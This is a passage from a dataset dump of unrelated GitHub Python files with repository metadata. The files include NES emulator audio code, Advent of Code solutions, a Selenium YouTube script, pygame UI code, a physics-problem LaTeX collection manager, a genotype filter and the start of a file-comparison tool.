PULSE_2_BASE <= address < (PULSE_2_BASE + CHANNEL_ADDRESS_RANGE):\n self.pulse2.write(address - PULSE_2_BASE, ord(val))\n elif TRIANGLE_BASE <= address < (TRIANGLE_BASE + CHANNEL_ADDRESS_RANGE):\n self.triangle.write(address - TRIANGLE_BASE, ord(val))\n elif NOISE_BASE <= address < (NOISE_BASE + CHANNEL_ADDRESS_RANGE):\n if APU_WARN:\n print >> sys.stderr, \\\n \"Frame %d: ignoring write to APU noise register 0x%04x: %02x\" % \\\n (self.cpu.ppu.frame, address, ord(val))\n elif DMC_BASE <= address < (DMC_BASE + CHANNEL_ADDRESS_RANGE):\n if APU_WARN:\n print >> sys.stderr, \\\n \"Frame %d: ignoring write to APU noise register 0x%04x: %02x\" % \\\n (self.cpu.ppu.frame, address, ord(val))\n else:\n raise RuntimeError(\n \"Frame %d: write to invalid APU register 0x%04x: %02x\" %\n (self.cpu.ppu.frame, address, ord(val)))\n\n def setStatus(self, statusByte):\n # TODO: ensure that this:\n # - Silences disabled channels and sets their length counter to 0\n # - Clears the DMC interrupt flag\n # - Does whatever DMC logic it needs to do depending on the DMC bit\n self.pulse1.setEnabled(bool(statusByte & PULSE_1_STATUS_MASK))\n self.pulse2.setEnabled(bool(statusByte & PULSE_1_STATUS_MASK))\n self.triangle.setEnabled(bool(statusByte & TRIANGLE_STATUS_MASK))\n self.noiseEnabled = bool(statusByte & NOISE_STATUS_MASK)\n self.dmcEnabled = bool(statusByte & DMC_STATUS_MASK)\n if APU_INFO:\n channels = []\n if self.pulse1.enabled:\n channels += [\"pulse wave 1\"]\n if self.pulse2.enabled:\n channels += [\"pulse wave 2\"]\n if self.triangle.enabled:\n channels += [\"triangle wave\"]\n if self.noiseEnabled:\n channels += [\"noise\"]\n if self.dmcEnabled:\n channels += [\"DMC\"]\n if channels:\n print >> sys.stderr, \"Frame %d: APU channels enabled: %s\" % \\\n (self.cpu.ppu.frame, \", \".join(channels))\n else:\n print >> sys.stderr, \"Frame %d: APU channels enabled: none\" % \\\n self.cpu.ppu.frame\n\n def frameDuration(self):\n if not self.fcMode:\n return APU_CYCLES_PER_4STEP_FRAME / APU_FREQUENCY\n else:\n return APU_CYCLES_PER_5STEP_FRAME / APU_FREQUENCY\n\n def fcSequence(self):\n if not self.fcMode:\n return APU_4STEP_SEQUENCE\n else:\n return APU_5STEP_SEQUENCE\n\n def frameCounterTick(self):\n sequence = self.fcSequence()\n (cycle, frameType) = sequence[self.fcSequenceIndex]\n if frameType < APU_FC_HALF_FRAME:\n self.capu.frameCounterQuarterFrame()\n else:\n # note: sending half frame also has effects of quarter frame\n self.capu.frameCounterHalfFrame()\n if (frameType == APU_FC_INTERRUPT) and not self.fcIRQInhibit:\n # send interrupt\n self.cpu.irqPending = True\n self.fcSequenceIndex = (self.fcSequenceIndex + 1) % len(sequence)\n self.fcSleep()\n\n\n # Determine the number of CPU cycles it will take until the frame\n # counter next acts, and tell the CPU what that number is.\n def fcSleep(self):\n sequence = self.fcSequence()\n if self.fcSequenceIndex > 0:\n c = (sequence[self.fcSequenceIndex][0] -\n sequence[self.fcSequenceIndex-1][0])\n else:\n if not self.fcMode:\n frameLen = (APU_CYCLES_PER_4STEP_FRAME *\n APU_CPU_CYCLES_PER_FC_CYCLE)\n else:\n frameLen = (APU_CYCLES_PER_5STEP_FRAME *\n APU_CPU_CYCLES_PER_FC_CYCLE)\n c = (sequence[self.fcSequenceIndex][0] -\n sequence[self.fcSequenceIndex-1][0] +\n frameLen)\n self.cpu.apuCyclesUntilAction = c\n","repo_name":"mkbehr/missingnes","sub_path":"apu.py","file_name":"apu.py","file_ext":"py","file_size_in_byte":23161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32257749098","text":"import re\n\npipes = [re.split('[\\\\s=;,]+', x) for x in open(\"input.txt\").read().splitlines()]\n\nG = {x[1]: set(x[10:]) for x in pipes}\nF = {x[1]: int(x[5]) for x in pipes if int(x[5]) != 0}\nI = {x: 1 << i for i, x in enumerate(F)}\nT = {x: {y: 1 if y in G[x] else float('+inf') for y in G} for x in G}\n\nfor k in T:\n for i in T:\n for j in T:\n T[i][j] = min(T[i][j], T[i][k]+T[k][j])\n\ndef visit(v, budget, state, value, answer):\n answer[state] = max(answer.get(state, 0), value)\n for u in F:\n newbudget = budget - T[v][u] - 1\n if I[u] & state or newbudget < 0: continue\n visit(u, newbudget, state | I[u], value + newbudget * F[u], answer)\n return answer \n\np1 = max(visit('AA', 30, 0, 0, {}).values())\nvisited2 = visit('AA', 26, 0, 0, {})\n\np2 = max(v1+v2 for k1, v1 in visited2.items() for k2, v2 in visited2.items() if not k1 & k2)\n\nprint(\"p1: \", p1)\nprint(\"p2: \", p2)\n","repo_name":"paulphys/adventofcode","sub_path":"2022/day16/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"74818418970","text":"from setuptools import setup, find_packages\n\ninstall_requires=[\n \"py-dummy-pkg @ git+ssh://git@github.com/az0uz/py-dummy-pkg.git@v0.1.0\"\n]\n\nsetup_requires=[\n \"py-dummy-pkg\"\n]\n\ndependency_links=[\n \"git+ssh://git@github.com/az0uz/py-dummy-pkg.git@v0.1.0#egg=py-dummy-pkg-0.1.0\"\n]\n\nsetup(\n name=\"py-foo-pkg\",\n version=\"0.1.2\",\n python_requires=\">=3.6\",\n install_requires=install_requires,\n setup_requires=setup_requires,\n dependency_links=dependency_links,\n packages=find_packages())\n","repo_name":"az0uz/py-foo-pkg","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3581499058","text":"from selenium import webdriver\r\nimport random\r\nimport time\r\nimport logging\r\nfrom selenium.webdriver.common.by import By\r\nimport requests\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver import Chrome, ChromeOptions\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\nfrom selenium.common.exceptions import TimeoutException\r\nimport os.path\r\nimport socket\r\n\r\nclass Web():\r\n \r\n def __init__(self):\r\n self.driver = self.create_driver()\r\n self.openSite()\r\n def create_options(self):\r\n options = webdriver.ChromeOptions() \r\n options.add_argument(\"start-maximized\")\r\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\r\n options.add_experimental_option('useAutomationExtension', False)\r\n return options\r\n def create_driver(self):\r\n return Chrome(chrome_options=self.create_options(),executable_path='C:/proiect/var_clase/chromedriver.exe')\r\n def openSite(self,url : str= 'https://www.youtube.com/',title :str = \"Youtube\"):\r\n self.driver.maximize_window()\r\n while self.is_connected()==False:\r\n try:\r\n self.driver.get(url)\r\n WebDriverWait(self.driver, 10).until(EC.title_contains(\"Youtube\"))\r\n break\r\n except :\r\n continue\r\n self.driver.get(url)\r\n def is_connected(self):\r\n try:\r\n socket.create_connection((\"1.1.1.1\", 53))\r\n return True\r\n except OSError:\r\n pass\r\n return False\r\n \r\n def acceptCookie(self):\r\n try:\r\n css_selector='ytd-button-renderer.ytd-consent-bump-v2-lightbox:nth-child(2) > a:nth-child(1) > tp-yt-paper-button:nth-child(1)'\r\n WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, css_selector))).click()\r\n except:\r\n print(\"no cookie\")\r\n def searchSong(self,search : str='music'):\r\n while self.is_connected()==False:\r\n continue\r\n try:\r\n WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.XPATH, '//div[@id=\"search-input\"]'))).click()\r\n WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.XPATH, '//input[@id=\"search\"]'))).send_keys(\"music\")\r\n except:\r\n print(\"not available\")\r\n while self.is_connected()==False:\r\n continue \r\n for i in range(5):\r\n try:\r\n WebDriverWait(self.driver, 20).until(EC.element_to_be_clickable((By.XPATH, '//button[@id=\"search-icon-legacy\"]'))).click()\r\n except:\r\n print(\"can't click search btn\")\r\n def getRandomSong(self):\r\n while self.is_connected()==False:\r\n continue \r\n user_data=\"\"\r\n while len(user_data)==0:\r\n try:\r\n user_data = self.driver.find_elements_by_xpath('//a[@id=\"thumbnail\"]')\r\n except:\r\n print(\"can't find elements\")\r\n print(len(user_data))\r\n links = []\r\n for i in user_data:\r\n links.append(i.get_attribute('href'))\r\n nr_video=random.randrange(0, len(links))\r\n while links[nr_video]==\"None\":\r\n nr_video=random.randrange(0, len(links))\r\n self.driver.get(links[nr_video])\r\n def playSong(self):\r\n while self.is_connected()==False:\r\n continue\r\n xpath_play_btn='/html/body/ytd-app/div/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[1]/div/div/div/ytd-player/div/div/div[5]/button'\r\n xpath_skip_btn='/html/body/ytd-app/div/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[1]/div/div/div/ytd-player/div/div/div[4]/div/div[3]/div/div[2]/span/button/div'\r\n try:\r\n WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.XPATH, xpath_play_btn))).click()\r\n except:\r\n print(\"can't play video\")\r\n for i in range(3):\r\n try:\r\n WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.XPATH, xpath_skip_btn))).click()\r\n except:\r\n print(\"no skip btn\")","repo_name":"AndraDediu98/project","sub_path":"var_clase/WebScraping.py","file_name":"WebScraping.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33776606490","text":"import Event, FocusEvent, FalseClickEvent, ExecussionEvent\nimport eventFunction, mouseFunction\n\nprint('ClickEvent library imported')\n\nclass ClickEvent(Event.Event):\n\n def update(self):\n # print(f'ClickEvent() - {self.type}.update() - {self.name}')\n if self.object :\n self.updateClickTimes()\n\n if self.object.singleClickable :\n self.proceedClick()\n elif self.object.doubleClickable :\n if self.clickTime - self.lastclickTime < 1 and self.clickTime != self.lastclickTime:\n self.proceedClick()\n else :\n FalseClickEvent.FalseClickEvent(self.application)\n\n self.updateStatus(eventFunction.Status.RESOLVED)\n\n def __init__(self,mouse,\n object = None,\n name = None,\n type = eventFunction.Type.CLICK_EVENT,\n inherited = False\n ):\n\n if not object :\n object = mouse.objectHit\n\n Event.Event.__init__(self,object,\n name = name,\n type = type,\n inherited = True\n )\n self.inherited = inherited\n\n self.mouse = mouse\n self.clickTime = self.application.timeNow\n self.objectClicked = self.getObjectClicked()\n\n self.execute()\n\n def getObjectClicked(self):\n if self.mouse.objectHitDown == self.mouse.objectHitUp :\n return self.mouse.objectHit\n\n def updateClickTimes(self):\n self.lastclickTime = self.clickTime\n self.clickTime = self.application.timeNow\n\n def proceedClick(self):\n if self.mouse.state == mouseFunction.State.LEFT_CLICK_DOWN or self.mouse.state == mouseFunction.State.LEFT_CLICK_UP :\n FocusEvent.FocusEvent(self.object)\n if self.mouse.state == mouseFunction.State.LEFT_CLICK_DOWN :\n pass\n if self.mouse.state == mouseFunction.State.LEFT_CLICK_UP :\n if self.objectClicked :\n self.click()\n\n def click(self):\n ExecussionEvent.ExecussionEvent(self)\n","repo_name":"SamuelJansen/Application","sub_path":"api/src/domain/event/click/ClickEvent.py","file_name":"ClickEvent.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6553577750","text":"import os\nimport codecs\nimport subprocess\nfrom functools import cmp_to_key\n\nfrom python_dependencies.utils import ProblemText, round_to_abbreviation, letter_to_agegroup\n\n\n# Store info about a problem, needs a file attached following the usual naming convention\n# Can be called to return the contents of the file and can be sorted in a nice way (see Collection)\nclass Problem:\n def __init__(self, file_name, directory=\"/\"):\n self.directory = directory\n self.file_name = file_name\n\n contents = self.get_content()\n self.problem_text = ProblemText(contents)\n self.name = str(self.problem_text.get_argument(0))\n self.author = str(self.problem_text.get_argument(1))\n self.age_group = letter_to_agegroup(self.problem_text.get_argument(4)[0])\n self.round = str(self.problem_text.get_argument(2))\n self.round_abbr = round_to_abbreviation(self.round, self.age_group)\n self.year = int(self.problem_text.get_argument(3))\n self.number = int(self.problem_text.get_argument(4)[2:])\n self.difficulty = int(self.problem_text.get_argument(5))\n self.topic = self.problem_text.get_topic().replace(\"-\", \" \")\n\n # TEMPORARY, USED FOR CHOOSING TOPICS FOR PROBLEMS WITH UNDETERMINED TOPICS\n def update_topic(self, idx):\n contents = self.get_content()\n loc = contents.index(\"Teema: \") + len(\"Teema: \")\n loc0 = loc\n while contents[loc] != \"\\n\":\n loc += 1\n\n teemad = [\"Dünaamika\", \"Elektriahelad\", \"Elektrostaatika\", \"Gaasid\", \"Geomeetriline-optika\", \"Kinemaatika\",\n \"Magnetism\", \"Staatika\", \"Taevamehaanika\", \"Termodünaamika\", \"Varia\", \"Vedelike-mehaanika\"]\n if self.topic == \"Töötlemata\":\n print(\"Options:\")\n for i in range(len(teemad)):\n print(f\"\\t{i}: {teemad[i]}\")\n x = input(f\"Topic of P{idx} {self.file_name}: \")\n if x.isdigit() and int(x) < len(teemad):\n x = teemad[int(x)]\n print(f\"Chosen topic was {x}\")\n print(\"=============================\")\n contents = contents[0:loc0] + x + contents[loc:-1] + contents[len(contents) - 1]\n with codecs.open(self.directory + self.file_name, \"w\", \"utf8\") as f:\n f.write(contents)\n\n def get_content(self, ):\n with codecs.open(self.directory + self.file_name, \"r\", \"utf8\") as f:\n return f.read().replace(\"\\r\\n\", \"\\n\").replace(\"\\r\", \"\\n\")\n\n # Removes all other \\if ... \\fi except the one being considered\n # Only serves to make .tex shorter, shouldn't make compilation faster...\n def get_tidy_content(self, if_type, prepend_appends=None):\n contents = ProblemText(self.problem_text.get_contents())\n\n if prepend_appends is not None:\n for instruction in prepend_appends:\n idx, start, end = instruction\n old_arg = contents.get_argument(idx)\n contents.update_argument(start + old_arg + end, idx)\n # Replace name with the english variant if language is english\n if if_type == \"EngStatement\" or if_type == \"EngSolution\":\n round_to_eng = {\"lahg\": r\"open competition\",\n \"v3g\": r\"national round\",\n \"v2g\": r\"regional round\"}\n # Update the name of the problem to be in English\n contents.update_argument(contents.get_eng_name(), 0)\n # Update the topic of the problem to be in English\n contents.update_argument(round_to_eng[self.round_abbr], 2)\n\n topic = f\"% Teema: {self.topic}\\n\"\n if if_type != \"Statement\":\n topic += \"\\n\"\n\n contents.update_argument(f'\\n{topic}{contents.get_if(if_type)}\\n', 6)\n return contents.contents\n\n\n# Custom comparator used for sorting Problems.\n# TODO: Make this more python-y? Currently uses python 2.x structure.\ndict_ = {\"lahg\": 0, \"v2g\": 1, \"v3g\": 2, \"lahp\": 3, \"v2p\": 4, \"v3p\": 5}\n\n\ndef custom_problem_sort(x, y):\n if x.topic > y.topic:\n return 1\n elif x.topic == y.topic:\n if x.difficulty > y.difficulty:\n return 1\n elif x.difficulty == y.difficulty:\n if x.year > y.year:\n return 1\n elif x.year == y.year:\n if dict_[x.round_abbr] > dict_[y.round_abbr]:\n return 1\n elif dict_[x.round_abbr] == dict_[y.round_abbr]:\n if x.number > y.number:\n return 1\n elif x.number == y.number:\n return 0\n return -1\n\n\n# Stores problems to form a collection. Is able to sort the problems in different ways\n# Default is to first sort by topic, then difficulty, then year, then round, then # of the problem.\n# Is able to return LaTeX friendly statements/hints/solutions for all problems in the collections\n# in different languages.\nclass Collection:\n def __init__(self, years):\n self.problems = []\n self.years = years\n\n def add_problem(self, problem):\n self.problems.append(problem)\n\n def problem_sort(self):\n self.problems.sort(key=cmp_to_key(custom_problem_sort))\n\n def get_est_statements(self, config=None):\n if config is None:\n config = {}\n ret = r'''\n \\section{Ülesanded}\n \\ToggleStatement\n '''\n covered_topics = {}\n included_graphics_paths = {}\n not_first = False\n\n for i, problem in enumerate(self.problems):\n if problem.topic not in covered_topics:\n if not_first:\n ret += \"\\\\newpage\"\n else:\n not_first = True\n covered_topics[problem.topic] = True\n ret += \"\\\\subsection{\\\\protect\\\\StrSubstitute{\" + problem.topic + \"}{-}{ }}\\n\"\n if problem.directory not in included_graphics_paths:\n ret += \"\\n\\\\graphicspath{{\" + str(problem.directory) + \"}}\\n\"\n included_graphics_paths[problem.directory] = True\n if \"P\" + str(i + 1) + \"_author\" in config:\n arg1 = (1, \"\" + config[\"P\" + str(i + 1) + \"_author\"], \"\")\n ret += f'\\n% Ü{str(i + 1)}\\n{problem.get_tidy_content(\"Statement\", (arg1,))}\\n'\n else:\n ret += f'\\n% Ü{str(i + 1)}\\n{problem.get_tidy_content(\"Statement\")}\\n'\n if \"P\" + str(i + 1) in config:\n ret += config[\"P\" + str(i + 1)] + \"\\n\"\n ret += \"\\\\newpage\"\n return ret\n\n def get_est_hints(self, config=None):\n if config is None:\n config = {}\n ret = r'''\\section{Vihjed}\n \\ToggleHint\n '''\n for i, problem in enumerate(self.problems):\n ret += f'\\n% V{str(i + 1)}\\n{problem.get_tidy_content(\"Hint\")}\\n'\n if \"H\" + str(i + 1) in config:\n ret += config[\"H\" + str(i + 1)] + \"\\n\"\n ret += \"\\\\newpage\"\n return ret\n\n def get_est_solutions(self, config=None):\n if config is None:\n config = {}\n ret = r'''\\section{Lahendused}\n \\ToggleSolution\n '''\n for i, problem in enumerate(self.problems):\n ret += f'\\n% L{str(i + 1)}\\n{problem.get_tidy_content(\"Solution\")}\\n'\n if \"S\" + str(i + 1) in config:\n ret += config[\"S\" + str(i + 1)] + \"\\n\"\n ret += \"\\\\newpage\"\n return ret\n\n def get_eng_statements(self):\n ret = r'''\n \\section{Problems}\n \\ToggleEngStatement\n '''\n covered_topics = {}\n included_graphics_paths = {}\n not_first = False\n\n topic_to_eng = {\"Dünaamika\": \"Dynamics\",\n \"Elektriahelad\": \"Electric circuits\",\n \"Elektrostaatika\": \"Electrostatics\",\n \"Gaasid\": \"Gases\",\n \"Geomeetriline optika\": \"Geometrical optics\",\n \"Kinemaatika\": \"Kinematics\",\n \"Laineoptika\": \"Wave optics\",\n \"Magnetism\": \"Magnetism\",\n \"Staatika\": \"Statics\",\n \"Taevamehaanika\": \"Stellar mechanics\",\n \"Termodünaamika\": \"Thermodynamics\",\n \"Varia\": \"Miscellaneous\",\n \"Vedelike mehaanika\": \"Liquid mechanics\"}\n\n for i, problem in enumerate(self.problems):\n if problem.topic not in covered_topics:\n if not_first:\n ret += \"\\\\newpage\"\n else:\n not_first = True\n covered_topics[problem.topic] = True\n ret += \"\\\\subsection{\\\\protect\\\\StrSubstitute{\" + topic_to_eng[problem.topic] + \"}{-}{ }}\\n\"\n if problem.directory not in included_graphics_paths:\n ret += \"\\n\\\\graphicspath{{\" + str(problem.directory) + \"}}\\n\"\n included_graphics_paths[problem.directory] = True\n ret += f'\\n% P{str(i + 1)}\\n{problem.get_tidy_content(\"EngStatement\")}\\n'\n ret += \"\\\\newpage\"\n return ret\n\n def get_eng_hints(self):\n ret = r'''\\section{Hints}\n \\ToggleEngHint\n '''\n for i, problem in enumerate(self.problems):\n ret += f'\\n% H{str(i + 1)}\\n{problem.get_tidy_content(\"EngHint\")}\\n'\n ret += \"\\\\newpage\"\n return ret\n\n def get_eng_solutions(self):\n ret = r'''\\section{Solutions}\n \\ToggleEngSolution\n '''\n for i, problem in enumerate(self.problems):\n ret += f'\\n% S{str(i + 1)}\\n{problem.get_tidy_content(\"EngSolution\")}\\n'\n ret += \"\\\\newpage\"\n return ret\n\n\n# Manages all the problems that are fed into it. Furthermore handles collection\n# initialisation and storing\nclass ProblemManager:\n def __init__(self):\n self.problems = []\n self.collection_one = Collection((2012, 2018))\n self.collection_two = Collection((2005, 2011))\n self.collection_all = Collection((1900, 2099))\n self.collection_one_younger = Collection((2012, 2018))\n\n def load_directory(self, directory=\"/\", strict=True):\n for file_name in os.listdir(directory):\n if is_valid_filename(file_name, strict):\n self.problems.append(Problem(file_name, directory))\n\n def partition_into_books(self):\n for problem in self.problems:\n if problem.age_group == \"high school\":\n self.collection_all.add_problem(problem)\n\n if 2011 <= problem.year <= 2018:\n if not (problem.year == 2011 and not (problem.round_abbr == \"lahg\" and problem.number <= 5)):\n if not (problem.year == 2018 and problem.round_abbr == \"lahg\"):\n self.collection_one.add_problem(problem)\n\n if 2005 <= problem.year <= 2011:\n if problem.year == 2011 and (problem.round_abbr == \"lahg\" and problem.number <= 5):\n continue\n self.collection_two.add_problem(problem)\n\n elif problem.age_group == \"middle school\":\n self.collection_one_younger.add_problem(problem)\n\n self.collection_one.problem_sort()\n self.collection_two.problem_sort()\n self.collection_all.problem_sort()\n self.collection_one_younger.problem_sort()\n\n\n# Determines whether the string follows the standard file naming convention of year-round-number.tex\ndef is_valid_filename(x, strict=True):\n if strict:\n args = x.strip(\".tex\").split(\"-\")\n if len(args) == 3 and args[0].isdigit() and args[1] in [\"v2g\", \"lahg\", \"v3g\"] and args[2].isdigit():\n if 1 <= int(args[2]) <= 10:\n return True\n return False\n else:\n return x.endswith(\".tex\")\n\n\n# Generates a pdf with LaTeX with argument contents as the contents of the .tex file to\n# be compiled. If repeat is enabled, the code is compiled twice for cross-references.\n# Also cleans up reduntant files\ndef generate_pdf(file_name, contents, repeat=False):\n with codecs.open(file_name + '.tex', 'w', 'utf-8') as f:\n f.write(contents)\n\n for i in range(1 + int(repeat)):\n commandLine = subprocess.Popen(['xelatex', file_name + '.tex'])\n commandLine.communicate() # Feedback from the console\n\n os.remove(file_name + '.aux')\n os.remove(file_name + '.log')\n os.remove(file_name + '.toc')\n os.remove(file_name + '.out')\n","repo_name":"Majakas/physics-collection","sub_path":"python_dependencies/problem_manager.py","file_name":"problem_manager.py","file_ext":"py","file_size_in_byte":12466,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"72232600410","text":"import pygame\n\npygame.init()\nscreen = pygame.display.set_mode((700, 400))\nscreen.fill('blue')\n\ndef button(screen, position, text):\n font = pygame.font.SysFont(\"Arial\", 50)\n text_render = font.render(text, 1, (255, 0, 0))\n x, y, w , h = text_render.get_rect()\n x, y = position\n pygame.draw.line(screen, (150, 150, 150), (x, y), (x + w , y), 5)\n pygame.draw.line(screen, (150, 150, 150), (x, y - 2), (x, y + h), 5)\n pygame.draw.line(screen, (50, 50, 50), (x, y + h), (x + w , y + h), 5)\n pygame.draw.line(screen, (50, 50, 50), (x + w , y+h), [x + w , y], 5)\n pygame.draw.rect(screen, (100, 100, 100), (x, y, w , h))\n def OnClick():\n pass\n return screen.blit(text_render, (x, y))\n\ndef InputBox(screen,pos, text):\n\n font = pygame.font.SysFont(\"Arial\", 50)\n text_render = font.render(text, 1, (255, 0, 0))\n color = pygame.Color('white')\n input_box = pygame.Rect(pos,(100,100))\n Box = pygame.draw.rect(screen, color, input_box, 0)\n \n screen.blit(text_render, (input_box.x+5, input_box.y+5))\n return input_box\ndef RemoveEntry(ClickableInstances,RemoveID):\n ClickableInstances.remove(RemoveID)\ndef AddEntry(ClickableInstances, yPos):\n print(yPos)\n yPos=yPos+60\n ClickableInstances.append(InputBox(screen, (100,yPos),70,50, '*',1,True))\n ClickableInstances.append(InputBox(screen, (180,yPos),70,50, '*',2,True))\nclass InputBox():\n def __init__(self,screen,pos,width,hight,text,MaxChar,edible):\n self.screen= screen\n self.BorderThickness=4\n self.pos = pos\n self.hight = hight\n self.width= width\n self.BorderPos = [x-self.BorderThickness for x in pos]\n self.BorderWidth = self.width+self.BorderThickness*2\n self.BorderHight = self.hight+self.BorderThickness*2\n self.text = text\n self.font = pygame.font.SysFont(\"Arial\", 50)\n self.text_render = self.font.render(text, 1, (0, 0, 255))\n self.FieldColor = pygame.Color('white')\n self.BorderColor = pygame.Color('black')\n self.MaxChar=MaxChar\n self.edible=edible\n self.active = False\n self.input_box = pygame.Rect(self.pos,(self.width,self.hight))\n self.border = pygame.Rect(self.BorderPos,(self.BorderWidth,self.BorderHight))\n pygame.draw.rect(self.screen, self.BorderColor, self.border, 0)\n pygame.draw.rect(self.screen, self.FieldColor, self.input_box, 0)\n \n screen.blit(self.text_render, (self.input_box.x+5, self.input_box.y+5))\n def update(self):\n\n if self.active ==True:\n self.BorderColor= pygame.Color('red')\n else:\n self.BorderColor= pygame.Color('black')\n self.text_render = self.font.render(self.text, 1, (0, 0, 255))\n pygame.draw.rect(self.screen, self.BorderColor, self.border, 0)\n pygame.draw.rect(self.screen, self.FieldColor, self.input_box, 0)\n \n screen.blit(self.text_render, (self.input_box.x+5, self.input_box.y+5))\n\ndef start():\n print(\"Ok, let's go\")\n\ndef menu(VariableArray):\n \"\"\" This is the menu that waits you to click the s key to start \"\"\"\n ClickableInstances=[]\n ClickableInstances.append(InputBox(screen, (300,300), 240, 50, 'Add Entry',0,False))\n ClickableInstances.append(InputBox(screen, (550,300), 120, 50, 'Start',0,False))\n for i in range(len(VariableArray)):\n\n ClickableInstances.append(InputBox(screen, (100,50+(i*60)),70,50, str(VariableArray[i][0]),1,True))\n ClickableInstances.append(InputBox(screen, (180,50+(i*60)),70,50, str(VariableArray[i][1]),2,True))\n done= False\n\n ActiveObjectId=None\n while not done:\n #Event Handling\n for event in pygame.event.get():\n \n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect.\n for i in range(len(ClickableInstances)):\n\n if ClickableInstances[i].input_box.collidepoint(event.pos):\n # Toggle the active variable.\n ClickableInstances[i].active = not ClickableInstances[i].active\n ActiveObjectId = i\n else:\n ClickableInstances[i].active = False\n\n ClickableInstances[i].update()\n # Change the current color of the input box.\n #color = color_active if active else color_inactive\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n \n if ActiveObjectId==0:\n AddEntry(ClickableInstances,ClickableInstances[-1].pos[1])\n elif event.key == pygame.K_BACKSPACE and ClickableInstances[ActiveObjectId].edible:\n ClickableInstances[ActiveObjectId].text = ClickableInstances[ActiveObjectId].text[:-1]\n elif len(ClickableInstances[ActiveObjectId].text)< ClickableInstances[ActiveObjectId].MaxChar and ClickableInstances[ActiveObjectId].edible:\n ClickableInstances[ActiveObjectId].text += event.unicode\n \n ClickableInstances[ActiveObjectId].update()\n pygame.display.update()\n pygame.quit()\nif __name__ == '__main__':\n DummyArray = [['U',3],['S',4],['T',1]]\n menu(DummyArray)\n","repo_name":"LeHype/Log2Vtk","sub_path":"resources/nice_button.py","file_name":"nice_button.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73143635930","text":"import argparse\nimport pandas as pd\nfrom collections import Counter\n\ndef get_uniquegeno(fname, out):\n df = pd.read_csv(fname, sep='\\t', index_col=0)\n exclude = []\n for index, row in df.iterrows():\n counts = (Counter(row))\n nunique = len(counts)\n\n # at least 3 unique genotypes (not counting '.' missing)\n if '.' in counts:\n nunique = nunique - 1\n if nunique >= 3:\n ngeno = 0\n raregeno = []\n for element in counts:\n if element != '.':\n #at least 3 samples per genotype\n if counts[element] >= 3:\n ngeno += 1\n else:\n raregeno.append(element)\n # if at least 3 samples for at least 3 genotypes, check for rare genotypes (less than 3 samples) and replace those as missing\n if ngeno >= 3:\n if raregeno:\n df.loc[index] = df.loc[index].replace(raregeno, ['.']*len(raregeno))\n else:\n exclude.append(index)\n else:\n exclude.append(index)\n df = df.drop(index=exclude)\n df.to_csv(out, sep='\\t')\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--fname\", required=True, help=\"Input genotype file\")\n parser.add_argument(\"-o\", \"--out\", required=True, help=\"Output genotype file with unique genotypes with at least 3 samples each\")\n params = parser.parse_args()\n get_uniquegeno(params.fname, params.out)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cynthiaewu/eqtl_preprocess","sub_path":"Scripts/get_unique_geno.py","file_name":"get_unique_geno.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15871778004","text":"from anytree import Node\n\ninput = open(\"input.txt\", \"r\")\norbitMap = []\nfor line in input:\n orbitMap.append(line[:-1].split(\")\"))\nCOM = Node(\"COM\")\nwhile len(orbitMap) > 0:\n orbitMapRemoved = []\n for item in orbitMap:\n print(len(orbitMapRemoved))\n print(item[0], COM.children)\n if item[0] in COM.children[-3:]:\n exec(item[1] + \" = \" + \"Node(\" + item[1] + \", parent=\" + item[0] + \")\")\n elif item[0] == COM:\n exec(item[1] + \" = \" + \"Node(\" + item[1] + \", parent=\" + item[0] + \")\")\n else:\n orbitMapRemoved.append(item)\n orbitMap = orbitMapRemoved\nprint(COM.children)","repo_name":"OBenjaminT/advent-of-code-in-python","sub_path":"2019/Day 6/Part 1/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24271055619","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/1/14 14:46\n# @Author : TYQ\n# @File : vscmp.py\n# @Software: win10 python3\n\nimport os\nimport filecmp\n\nimport chardet\n\nfrom lib.readcfg import ReadCfg\nfrom lib.Logger import logger\nimport difflib\nfrom fnmatch import fnmatchcase as match\nimport time\n\n\ndef exclude_files(filename, excludes=[]): # 是否属于不下载的文件判断\n # exclude 为具体配置,支持文件名配置及带目录的配置 # exclude 的不下载,跳过本次循环,进入下一循环\n if filename in excludes:\n return True\n\n # exclude 